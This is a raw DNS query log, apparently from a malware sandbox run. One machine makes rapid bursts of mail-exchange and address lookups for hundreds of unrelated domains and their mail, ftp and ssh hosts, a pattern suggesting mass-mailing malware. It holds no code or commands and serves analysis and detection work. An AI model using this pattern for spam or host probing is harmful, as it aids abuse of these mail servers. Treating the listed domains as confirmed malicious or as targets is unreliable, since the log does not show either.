                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.674119949 CET192.168.2.61.1.1.10xd256Standard query (0)llefigaro.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.675863981 CET192.168.2.61.1.1.10x94c6Standard query (0)cznkqhnq.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.676709890 CET192.168.2.61.1.1.10xe84dStandard query (0)khodyari.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.677597046 CET192.168.2.61.1.1.10x1f8eStandard query (0)fadeev.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.718455076 CET192.168.2.61.1.1.10x37c9Standard query (0)ace-service.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.720205069 CET192.168.2.61.1.1.10x5a90Standard query (0)jumpnsplashwear.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.721153021 CET192.168.2.61.1.1.10x855cStandard query (0)devbreeze.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.722140074 CET192.168.2.61.1.1.10x6f54Standard query (0)mcsmk8.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.734206915 CET192.168.2.61.1.1.10x28b7Standard query (0)aryainstrument.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.734381914 CET192.168.2.61.1.1.10x7bf6Standard query (0)condorponteggi.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.734580040 CET192.168.2.61.1.1.10xf059Standard query (0)azarkavin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.738303900 CET192.168.2.61.1.1.10xc419Standard query (0)manizan.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.746052980 CET192.168.2.61.1.1.10x7d49Standard query (0)laachir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.746283054 CET192.168.2.61.1.1.10x320aStandard query (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.747808933 CET192.168.2.61.1.1.10xfb46Standard query (0)er.styggMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.747853994 CET192.168.2.61.1.1.10xadcStandard query (0)mlk546gabr.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.849004984 CET192.168.2.61.1.1.10x8a2fStandard query (0)moradfarag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.849268913 CET192.168.2.61.1.1.10x9805Standard query (0)doriangrey.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.852058887 CET192.168.2.61.1.1.10x7720Standard query (0)entodo.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.852487087 CET192.168.2.61.1.1.10xac31Standard query (0)yahoogabes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.852674007 CET192.168.2.61.1.1.10x5030Standard query (0)finaleasing.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.852853060 CET192.168.2.61.1.1.10xc97Standard query (0)mgnbizlaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.853080988 CET192.168.2.61.1.1.10x535eStandard query (0)reign.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.853403091 CET192.168.2.61.1.1.10xa279Standard query (0)3marc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.853416920 CET192.168.2.61.1.1.10x31cbStandard query (0)goexlife.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.853672981 CET192.168.2.61.1.1.10x3ef1Standard query (0)joslindisplaysinc.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.854387045 CET192.168.2.61.1.1.10xaeadStandard query (0)frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.854743004 CET192.168.2.61.1.1.10xf80aStandard query (0)bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.855098963 CET192.168.2.61.1.1.10x9864Standard query (0)slovtain.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.855333090 CET192.168.2.61.1.1.10x1c6eStandard query (0)princessmonty.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.855551004 CET192.168.2.61.1.1.10xf748Standard query (0)bokod.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.855711937 CET192.168.2.61.1.1.10xec6aStandard query (0)fedyanin.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.856802940 CET192.168.2.61.1.1.10x1d00Standard query (0)pfprojekt.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.857328892 CET192.168.2.61.1.1.10xa7cdStandard query (0)blagotvoritel.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.857599974 CET192.168.2.61.1.1.10x6442Standard query (0)ext.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.858084917 CET192.168.2.61.1.1.10xf771Standard query (0)evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.858249903 CET192.168.2.61.1.1.10x905aStandard query (0)conceptualintegration.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.858699083 CET192.168.2.61.1.1.10x2582Standard query (0)euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.859955072 CET192.168.2.61.1.1.10xb1eaStandard query (0)evropskypravnik.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.860258102 CET192.168.2.61.1.1.10xdd3dStandard query (0)egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.860600948 CET192.168.2.61.1.1.10xe36Standard query (0)estbest.eeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.862260103 CET192.168.2.61.1.1.10x1638Standard query (0)topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.862507105 CET192.168.2.61.1.1.10x6feaStandard query (0)esn.spb.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.862863064 CET192.168.2.61.1.1.10x686eStandard query (0)dune-architecture.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.867667913 CET192.168.2.61.1.1.10x205aStandard query (0)my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.868398905 CET192.168.2.61.1.1.10x2141Standard query (0)ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.868796110 CET192.168.2.61.1.1.10xf013Standard query (0)erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.009771109 CET192.168.2.61.1.1.10xaabaStandard query (0)eremina.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.010617018 CET192.168.2.61.1.1.10xa32dStandard query (0)mail.tomsknetruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.011487007 CET192.168.2.61.1.1.10x3315Standard query (0)kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.015757084 CET192.168.2.61.1.1.10xf444Standard query (0)elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.032449007 CET192.168.2.61.1.1.10xe20fStandard query (0)aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.039750099 CET192.168.2.61.1.1.10x8c67Standard query (0)winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.043085098 CET192.168.2.61.1.1.10x560cStandard query (0)noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.048059940 CET192.168.2.61.1.1.10xe22fStandard query (0)elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.074894905 CET192.168.2.61.1.1.10xe255Standard query (0)elohin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.245354891 CET192.168.2.61.1.1.10xc1cfStandard query (0)yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.250102997 CET192.168.2.61.1.1.10xe500Standard query (0)r2husers.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.266788006 CET192.168.2.61.1.1.10xbae8Standard query (0)bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.272056103 CET192.168.2.61.1.1.10xda91Standard query (0)moraci.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.272418976 CET192.168.2.61.1.1.10xc149Standard query (0)neugear.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.272798061 CET192.168.2.61.1.1.10x6fa2Standard query (0)la-morada.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.273046017 CET192.168.2.61.1.1.10x1c47Standard query (0)malibusands.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.273319006 CET192.168.2.61.1.1.10x36e7Standard query (0)brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.273821115 CET192.168.2.61.1.1.10xe96fStandard query (0)assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.276062012 CET192.168.2.61.1.1.10x1c88Standard query (0)rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.276350975 CET192.168.2.61.1.1.10x4f10Standard query (0)slovtain.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.276401997 CET192.168.2.61.1.1.10x5379Standard query (0)datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.277527094 CET192.168.2.61.1.1.10x1b36Standard query (0)llefigaro.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.277544975 CET192.168.2.61.1.1.10xcbd8Standard query (0)princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.277846098 CET192.168.2.61.1.1.10x4476Standard query (0)cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.278523922 CET192.168.2.61.1.1.10xb28dStandard query (0)khodyari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.279067993 CET192.168.2.61.1.1.10x62adStandard query (0)fadeev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.279701948 CET192.168.2.61.1.1.10x4a2cStandard query (0)jumpnsplashwear.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.279828072 CET192.168.2.61.1.1.10x835aStandard query (0)ace-service.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.279937983 CET192.168.2.61.1.1.10x63c8Standard query (0)devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.280232906 CET192.168.2.61.1.1.10xd3ebStandard query (0)mcsmk8.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.287383080 CET192.168.2.61.1.1.10xb7ecStandard query (0)aryainstrument.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.287760019 CET192.168.2.61.1.1.10x3eecStandard query (0)goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.288121939 CET192.168.2.61.1.1.10x8d74Standard query (0)3marc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.289046049 CET192.168.2.61.1.1.10xa6c6Standard query (0)joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.290354967 CET192.168.2.61.1.1.10xfc19Standard query (0)mgnbizlaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.290597916 CET192.168.2.61.1.1.10xfa1dStandard query (0)reign.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.465023041 CET192.168.2.61.1.1.10xba07Standard query (0)finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.474347115 CET192.168.2.61.1.1.10xe18dStandard query (0)doriangrey.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.570826054 CET192.168.2.61.1.1.10x98bcStandard query (0)yahoogabes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.576484919 CET192.168.2.61.1.1.10x7b2aStandard query (0)entodo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.580204010 CET192.168.2.61.1.1.10xc1cfStandard query (0)yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.597598076 CET192.168.2.61.1.1.10x4557Standard query (0)moradfarag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.598169088 CET192.168.2.61.1.1.10x6a06Standard query (0)mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.601011992 CET192.168.2.61.1.1.10x16caStandard query (0)r2husers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.601305962 CET192.168.2.61.1.1.10xf489Standard query (0)laachir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.957504034 CET192.168.2.61.1.1.10x5379Standard query (0)datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.957626104 CET192.168.2.61.1.1.10x4f10Standard query (0)slovtain.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.957689047 CET192.168.2.61.1.1.10xb7ecStandard query (0)aryainstrument.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.957690001 CET192.168.2.61.1.1.10x62adStandard query (0)fadeev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.957828999 CET192.168.2.61.1.1.10xc419Standard query (0)manizan.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.957828999 CET192.168.2.61.1.1.10x6ad7Standard query (0)datasense.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958039999 CET192.168.2.61.1.1.10xba07Standard query (0)finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958039999 CET192.168.2.61.1.1.10xe18dStandard query (0)doriangrey.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958077908 CET192.168.2.61.1.1.10x4557Standard query (0)moradfarag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958117008 CET192.168.2.61.1.1.10xf489Standard query (0)laachir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958389997 CET192.168.2.61.1.1.10x6a06Standard query (0)mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958389997 CET192.168.2.61.1.1.10xa496Standard query (0)exmur.nia.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.958750010 CET192.168.2.61.1.1.10xd32eStandard query (0)manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.963146925 CET192.168.2.61.1.1.10x6cf1Standard query (0)er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.043512106 CET192.168.2.61.1.1.10x43dStandard query (0)azarkavin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.043512106 CET192.168.2.61.1.1.10x300dStandard query (0)condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.062868118 CET192.168.2.61.1.1.10xd3f2Standard query (0)dunearchitecture-be01b.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.106122017 CET192.168.2.61.1.1.10x471dStandard query (0)w01c2c31.kasserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.147717953 CET192.168.2.61.1.1.10x7659Standard query (0)alt4.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.148058891 CET192.168.2.61.1.1.10x791Standard query (0)mail.hope-mail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.148058891 CET192.168.2.61.1.1.10xd17fStandard query (0)mx.mcsmk8.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.149349928 CET192.168.2.61.1.1.10xb91aStandard query (0)mx.jumpnsplashwear.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.151767015 CET192.168.2.61.1.1.10xe4a6Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.151767015 CET192.168.2.61.1.1.10x217aStandard query (0)mgnbizlaw-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.510238886 CET192.168.2.61.1.1.10x43dStandard query (0)azarkavin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.633586884 CET192.168.2.61.1.1.10xabb6Standard query (0)mx.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.640091896 CET192.168.2.61.1.1.10x7a14Standard query (0)aceservice-fr0i.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.274646044 CET192.168.2.61.1.1.10x840bStandard query (0)nihcesxway.hub.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.289273977 CET192.168.2.61.1.1.10x8c11Standard query (0)mail.bokod.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.305536032 CET192.168.2.61.1.1.10xd12cStandard query (0)mail.aryainstrument.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.615962982 CET192.168.2.61.1.1.10xc1f7Standard query (0)hub.smartweb.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.616173983 CET192.168.2.61.1.1.10x635aStandard query (0)ftp.princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.617206097 CET192.168.2.61.1.1.10x690bStandard query (0)ms2.aerohosting.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.617650986 CET192.168.2.61.1.1.10x9908Standard query (0)mx1.serverclienti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.617959023 CET192.168.2.61.1.1.10x896cStandard query (0)gwmail.pfprojekt.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.618236065 CET192.168.2.61.1.1.10xf5cbStandard query (0)mx.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.619326115 CET192.168.2.61.1.1.10xf1d4Standard query (0)mx1.pub.mailpod9-cph3.one.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.620018005 CET192.168.2.61.1.1.10x3633Standard query (0)mx1.forwardemail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.620280027 CET192.168.2.61.1.1.10xd64Standard query (0)mail.azarkavin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.624064922 CET192.168.2.61.1.1.10x8c11Standard query (0)mail.bokod.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.626797915 CET192.168.2.61.1.1.10x8e82Standard query (0)mx.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.629009008 CET192.168.2.61.1.1.10x418dStandard query (0)mail.doriangrey.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.637940884 CET192.168.2.61.1.1.10xd12cStandard query (0)mail.aryainstrument.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.639589071 CET192.168.2.61.1.1.10x3e55Standard query (0)mx1.spaceweb.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.977264881 CET192.168.2.61.1.1.10xd64Standard query (0)mail.azarkavin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.977335930 CET192.168.2.61.1.1.10xf5cbStandard query (0)mx.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.977336884 CET192.168.2.61.1.1.10x8e82Standard query (0)mx.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.977336884 CET192.168.2.61.1.1.10x418dStandard query (0)mail.doriangrey.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.980927944 CET192.168.2.61.1.1.10xff59Standard query (0)ftp.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.983232021 CET192.168.2.61.1.1.10xec78Standard query (0)mail.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.983232021 CET192.168.2.61.1.1.10x69acStandard query (0)ssh.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.983232021 CET192.168.2.61.1.1.10x3e55Standard query (0)mx1.spaceweb.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.014883995 CET192.168.2.61.1.1.10x4553Standard query (0)mail.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.308747053 CET192.168.2.61.1.1.10xa7d4Standard query (0)hoster.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.310755014 CET192.168.2.61.1.1.10x481dStandard query (0)www.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.311311007 CET192.168.2.61.1.1.10xf46bStandard query (0)www.slovtain.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.475298882 CET192.168.2.61.1.1.10x4553Standard query (0)mail.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.478831053 CET192.168.2.61.1.1.10xbf81Standard query (0)www.entodo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.604654074 CET192.168.2.61.1.1.10xe2b7Standard query (0)www.datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.610740900 CET192.168.2.61.1.1.10xcddcStandard query (0)ssh.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.616298914 CET192.168.2.61.1.1.10xfa55Standard query (0)ftp.llefigaro.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.629369020 CET192.168.2.61.1.1.10xf0e4Standard query (0)ftp.my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.799828053 CET192.168.2.61.1.1.10xf46bStandard query (0)www.slovtain.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.815164089 CET192.168.2.61.1.1.10xbf81Standard query (0)www.entodo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.827249050 CET192.168.2.61.1.1.10x7d7cStandard query (0)www.dune-architecture.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.054977894 CET192.168.2.61.1.1.10xe2b7Standard query (0)www.datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.072698116 CET192.168.2.61.1.1.10x2627Standard query (0)www.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.079303980 CET192.168.2.61.1.1.10xce1bStandard query (0)imap.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.177117109 CET192.168.2.61.1.1.10xccc8Standard query (0)www.attineos-cyber.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.226246119 CET192.168.2.61.1.1.10xda75Standard query (0)ftp.mail.tomsknetruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.354814053 CET192.168.2.61.1.1.10x1795Standard query (0)ssh.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.359802008 CET192.168.2.61.1.1.10xa8aaStandard query (0)elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.360171080 CET192.168.2.61.1.1.10x2ba0Standard query (0)winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.411324978 CET192.168.2.61.1.1.10x576cStandard query (0)erofeev.infoA (IP address)IN (0x0001)false
